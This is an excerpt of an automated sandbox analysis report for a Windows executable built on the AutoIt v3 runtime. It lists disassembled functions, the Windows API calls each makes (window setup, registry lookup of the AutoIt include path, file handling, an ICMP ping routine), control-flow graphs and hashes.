                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 420147892-0
                                                                                                                                                                                                                                                                                            • Opcode ID: d2851f99cb48869c5b46385acc42fcc951e1bb269d304cf020c07d32c2d1b7fc
                                                                                                                                                                                                                                                                                            • Instruction ID: dd9c1cd81a85439b8e5366cf502ac005aad57587bdfa226aefd2626362a64cf2
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d2851f99cb48869c5b46385acc42fcc951e1bb269d304cf020c07d32c2d1b7fc
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 94318F711083009FD311EF60D885BAFBBF8AF9A354F04092DF586871A1DB719A85DB92
                                                                                                                                                                                                                                                                                            Function 00C1EE54 Relevance: 21.6, APIs: 14, Instructions: 612windowsleeptimeCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetInputState.USER32 ref: 00C1EF07
                                                                                                                                                                                                                                                                                            • timeGetTime.WINMM ref: 00C1F107
                                                                                                                                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C1F228
                                                                                                                                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 00C1F27B
                                                                                                                                                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 00C1F289
                                                                                                                                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C1F29F
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 00C1F2B1
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2189390790-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 6e56a674a51c1fdd322b11ec38e57198b26eca154b1f7bd15cf907585edd1ea2
                                                                                                                                                                                                                                                                                            • Instruction ID: 06e0a9254a3eb9f9af33f7cca83e813aa82ce2ef7068cc3bb3d2d0f16a5b8919
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e56a674a51c1fdd322b11ec38e57198b26eca154b1f7bd15cf907585edd1ea2
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE320330604341EFD738CF24C884BAEB7E4BF86314F14456DE566872A1C771EA86EB92
                                                                                                                                                                                                                                                                                            Function 00C13624 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00C13657
                                                                                                                                                                                                                                                                                            • RegisterClassExW.USER32(00000030), ref: 00C13681
                                                                                                                                                                                                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C13692
                                                                                                                                                                                                                                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 00C136AF
                                                                                                                                                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C136BF
                                                                                                                                                                                                                                                                                            • LoadIconW.USER32(000000A9), ref: 00C136D5
                                                                                                                                                                                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C136E4
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                                                                            • API String ID: 2914291525-1005189915
                                                                                                                                                                                                                                                                                            • Opcode ID: 569c8fe8cc43a5f80c12961bf0a0e7b84cd67e6790ce7e1ab1a5f276c03618b8
                                                                                                                                                                                                                                                                                            • Instruction ID: 14890feb6da309592178dc1e3408822db44d91fe1869293a194e41e471887dae
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 569c8fe8cc43a5f80c12961bf0a0e7b84cd67e6790ce7e1ab1a5f276c03618b8
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E21E0B1D01358AFDB04DFA4E889BDDBBB8FB09714F00511AF612AB2A0DBB445808F90
                                                                                                                                                                                                                                                                                            Function 00C509DB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 366 c509db-c50a0b call c507af 369 c50a26-c50a32 call c45594 366->369 370 c50a0d-c50a18 call c3f636 366->370 375 c50a34-c50a49 call c3f636 call c3f649 369->375 376 c50a4b-c50a94 call c5071a 369->376 377 c50a1a-c50a21 call c3f649 370->377 375->377 386 c50a96-c50a9f 376->386 387 c50b01-c50b0a GetFileType 376->387 384 c50cfd-c50d03 377->384 391 c50ad6-c50afc GetLastError call c3f613 386->391 392 c50aa1-c50aa5 386->392 388 c50b53-c50b56 387->388 389 c50b0c-c50b3d GetLastError call c3f613 CloseHandle 387->389 395 c50b5f-c50b65 388->395 396 c50b58-c50b5d 388->396 389->377 403 c50b43-c50b4e call c3f649 389->403 391->377 392->391 397 c50aa7-c50ad4 call c5071a 392->397 400 c50b69-c50bb7 call c454dd 395->400 401 c50b67 395->401 396->400 397->387 397->391 408 c50bc7-c50beb call c504cd 400->408 409 c50bb9-c50bc5 call c5092b 400->409 401->400 403->377 416 c50bed 408->416 417 c50bfe-c50c41 408->417 409->408 415 c50bef-c50bf9 call c48a2e 409->415 415->384 416->415 419 c50c43-c50c47 417->419 420 c50c62-c50c70 417->420 419->420 422 c50c49-c50c5d 419->422 423 c50c76-c50c7a 420->423 424 c50cfb 420->424 422->420 423->424 425 c50c7c-c50caf CloseHandle call c5071a 423->425 424->384 428 c50cb1-c50cdd GetLastError call c3f613 call c456a6 425->428 429 c50ce3-c50cf7 425->429 428->429 429->424
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C5071A: CreateFileW.KERNEL32(00000000,00000000,?,00C50A84,?,?,00000000,?,00C50A84,00000000,0000000C), ref: 00C50737
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C50AEF
                                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00C50AF6
                                                                                                                                                                                                                                                                                            • GetFileType.KERNEL32(00000000), ref: 00C50B02
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C50B0C
                                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00C50B15
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C50B35
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00C50C7F
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C50CB1
                                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00C50CB8
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                                            • String ID: H
                                                                                                                                                                                                                                                                                            • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                                                                            • Opcode ID: a94cdf245cd7ade9191fd17eea814b1b40171dc67115a3489521e33f323b09c4
                                                                                                                                                                                                                                                                                            • Instruction ID: 3ca464925940012a3309d25da08e6afb8a497de593aeb9d5f85538d2c5b92331
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a94cdf245cd7ade9191fd17eea814b1b40171dc67115a3489521e33f323b09c4
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 93A14736A102448FCF18AF68D892BAD3BB0AB06325F24015DFC11DF2A2D7319D96DB55
                                                                                                                                                                                                                                                                                            Function 00C152A7 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C15594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00C54B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00C155B2
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C15238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C1525A
                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00C153C4
                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00C54BFD
                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00C54C3E
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00C54C80
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C54CE7
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C54CF6
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                                                                                                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                                                                                                                            • API String ID: 98802146-2727554177
                                                                                                                                                                                                                                                                                            • Opcode ID: a27064dccb79f9a5d0ba24f5a7d89411838547fb6cd49faa6b6d5e3ce42d2519
                                                                                                                                                                                                                                                                                            • Instruction ID: eb58f5c5d19460ebb235609a0f57850b708b290bf2100898b923f67acdcf56d7
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a27064dccb79f9a5d0ba24f5a7d89411838547fb6cd49faa6b6d5e3ce42d2519
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A717E715043819AC704EF65EC85EAEBBE8FF99344F80442DF452871B0DB71AA89EB52
                                                                                                                                                                                                                                                                                            Function 00C134D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00C134DE
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00C134ED
                                                                                                                                                                                                                                                                                            • LoadIconW.USER32(00000063), ref: 00C13503
                                                                                                                                                                                                                                                                                            • LoadIconW.USER32(000000A4), ref: 00C13515
                                                                                                                                                                                                                                                                                            • LoadIconW.USER32(000000A2), ref: 00C13527
                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C1353F
                                                                                                                                                                                                                                                                                            • RegisterClassExW.USER32(?), ref: 00C13590
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C13624: GetSysColorBrush.USER32(0000000F), ref: 00C13657
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C13624: RegisterClassExW.USER32(00000030), ref: 00C13681
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C13624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C13692
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C13624: InitCommonControlsEx.COMCTL32(?), ref: 00C136AF
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C13624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C136BF
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C13624: LoadIconW.USER32(000000A9), ref: 00C136D5
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C13624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C136E4
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                                                            • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                                                                            • API String ID: 423443420-4155596026
                                                                                                                                                                                                                                                                                            • Opcode ID: aff66964fe946429f6b976efe1344229947d19b68a822d66999af1a86f36da79
                                                                                                                                                                                                                                                                                            • Instruction ID: 270d4f340e90feb174f0ef2a2cc5b5e7798ff84f252f1dc87964ee8fe9ba4e7a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aff66964fe946429f6b976efe1344229947d19b68a822d66999af1a86f36da79
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB213D70D40398ABDB109FA5EC95BAD7FBCFB09754F00001AF606AB2B0C7B905449F90
                                                                                                                                                                                                                                                                                            Function 00C90FB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 507 c90fb8-c90fef call c1e6a0 510 c9100f-c91021 WSAStartup 507->510 511 c90ff1-c90ffe call c1c98d 507->511 513 c91023-c91031 510->513 514 c91054-c91091 call c2c1f6 call c18ec0 call c2f9d4 inet_addr gethostbyname 510->514 511->510 519 c91000-c9100b call c1c98d 511->519 516 c91033 513->516 517 c91036-c91046 513->517 530 c91093-c910a0 IcmpCreateFile 514->530 531 c910a2-c910b0 514->531 516->517 520 c91048 517->520 521 c9104b-c9104f 517->521 519->510 520->521 524 c91249-c91251 521->524 530->531 532 c910d3-c91100 call c3017b call c1423c 530->532 533 c910b2 531->533 534 c910b5-c910c5 531->534 543 c9112b-c91148 IcmpSendEcho 532->543 544 c91102-c91129 IcmpSendEcho 532->544 533->534 535 c910ca-c910ce 534->535 536 c910c7 534->536 538 c91240-c91244 call c1bd98 535->538 536->535 538->524 545 c9114c-c9114e 543->545 544->545 546 c911ae-c911bc 545->546 547 c91150-c91155 545->547 550 c911be 546->550 551 c911c1-c911c8 546->551 548 c911f8-c9120a call c1e6a0 547->548 549 c9115b-c91160 547->549 565 c9120c-c9120e 548->565 566 c91210 548->566 552 c911ca-c911d8 549->552 553 c91162-c91167 549->553 550->551 555 c911e4-c911ed 551->555 560 c911da 552->560 561 c911dd 552->561 553->546 558 c91169-c9116e 553->558 556 c911ef 555->556 557 c911f2-c911f6 555->557 556->557 562 c91212-c91229 IcmpCloseHandle WSACleanup 557->562 563 c91170-c91175 558->563 564 c91193-c911a1 558->564 560->561 561->555 562->538 570 c9122b-c9123d call c3013d call c30184 562->570 563->552 567 c91177-c91185 563->567 568 c911a3 564->568 569 c911a6-c911ac 564->569 565->562 566->562 571 c9118a-c91191 567->571 572 c91187 567->572 568->569 569->555 570->538 571->555 572->571
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • WSAStartup.WS2_32(00000101,?), ref: 00C91019
                                                                                                                                                                                                                                                                                            • inet_addr.WSOCK32(?), ref: 00C91079
                                                                                                                                                                                                                                                                                            • gethostbyname.WS2_32(?), ref: 00C91085
                                                                                                                                                                                                                                                                                            • IcmpCreateFile.IPHLPAPI ref: 00C91093
                                                                                                                                                                                                                                                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00C91123
                                                                                                                                                                                                                                                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00C91142
                                                                                                                                                                                                                                                                                            • IcmpCloseHandle.IPHLPAPI(?), ref: 00C91216
                                                                                                                                                                                                                                                                                            • WSACleanup.WSOCK32 ref: 00C9121C
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                                                                                                                            • String ID: Ping
                                                                                                                                                                                                                                                                                            • API String ID: 1028309954-2246546115
                                                                                                                                                                                                                                                                                            • Opcode ID: 0409cc2b09c794ae6dcca43b138736660e0abf4f16522ffe5de32e15a866297d
                                                                                                                                                                                                                                                                                            • Instruction ID: 0bd1a824fc60c6b432d5b2703c20ce38011afea5197ac7ba2f693d96f7d61462
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0409cc2b09c794ae6dcca43b138736660e0abf4f16522ffe5de32e15a866297d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 82918471604242AFDB20DF15C889B5ABBE0FF45318F188599F965CB7A2C731ED85CB81
                                                                                                                                                                                                                                                                                            Function 00C1370F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 577 c1370f-c13724 578 c13784-c13786 577->578 579 c13726-c13729 577->579 578->579 582 c13788 578->582 580 c1372b-c13732 579->580 581 c1378a 579->581 586 c13804-c1380c PostQuitMessage 580->586 587 c13738-c1373d 580->587 584 c53df4-c53e1c call c12f92 call c2f23c 581->584 585 c13790-c13795 581->585 583 c1376f-c13777 DefWindowProcW 582->583 593 c1377d-c13783 583->593 623 c53e21-c53e28 584->623 588 c13797-c1379a 585->588 589 c137bc-c137e3 SetTimer RegisterWindowMessageW 585->589 594 c137b8-c137ba 586->594 590 c13743-c13747 587->590 591 c53e61-c53e75 call c7c8f7 587->591 595 c53d95-c53d98 588->595 596 c137a0-c137b3 KillTimer call c13907 call c159ff 588->596 589->594 597 c137e5-c137f0 CreatePopupMenu 589->597 598 c1374d-c13752 590->598 599 c1380e-c13818 call c2fcad 590->599 591->594 617 c53e7b 591->617 594->593 602 c53dd0-c53def MoveWindow 595->602 603 c53d9a-c53d9e 595->603 596->594 597->594 605 c53e46-c53e4d 598->605 606 c13758-c1375d 598->606 610 c1381d 599->610 602->594 611 c53da0-c53da3 603->611 612 c53dbf-c53dcb SetFocus 603->612 605->583 614 c53e53-c53e5c call c71423 605->614 615 c13763-c13769 606->615 616 c137f2-c13802 call c1381f 606->616 610->594 611->615 619 c53da9-c53dba call c12f92 611->619 612->594 614->583 615->583 615->623 616->594 617->583 619->594 623->583 624 c53e2e-c53e41 call c13907 call c1396b 623->624 624->583
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00C13709,?,?), ref: 00C13777
                                                                                                                                                                                                                                                                                            • KillTimer.USER32(?,00000001,?,?,?,?,?,00C13709,?,?), ref: 00C137A3
                                                                                                                                                                                                                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C137C6
                                                                                                                                                                                                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00C13709,?,?), ref: 00C137D1
                                                                                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 00C137E5
                                                                                                                                                                                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 00C13806
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                                                                            • String ID: TaskbarCreated
                                                                                                                                                                                                                                                                                            • API String ID: 129472671-2362178303
                                                                                                                                                                                                                                                                                            • Opcode ID: b8ebb6430930105f6f06019d4547483b48c1bfaec0b86a85959dbd5806038eaf
                                                                                                                                                                                                                                                                                            • Instruction ID: 92c908b7129181dc913aa9565a067f381b5c5d778917f4b818acca87bd8cc82c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b8ebb6430930105f6f06019d4547483b48c1bfaec0b86a85959dbd5806038eaf
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B441E9F52001C4BADB185B289E8ABFD3A6DE703308F004125F9128A5E5CAA49BC5B7A1
                                                                                                                                                                                                                                                                                            Function 00C490C5 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
